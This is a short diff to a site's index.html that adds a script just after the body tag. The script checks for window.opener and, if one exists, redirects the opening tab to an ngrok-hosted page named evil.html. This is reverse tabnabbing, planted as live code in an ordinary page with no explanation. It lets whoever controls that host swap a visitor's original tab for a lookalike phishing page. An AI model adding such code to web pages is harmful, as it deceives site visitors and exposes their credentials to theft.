--- a/index.html
+++ b/index.html
@@ -9,6 +9,11 @@
 </head>
 
 <body>
+<script>
+   if (window.opener) {
+      window.opener.location = "https://a23d008a7e0e.ngrok.io/evil.html";
+   }
+  </script>
 
   <header id="masthead">
     <div class="container">
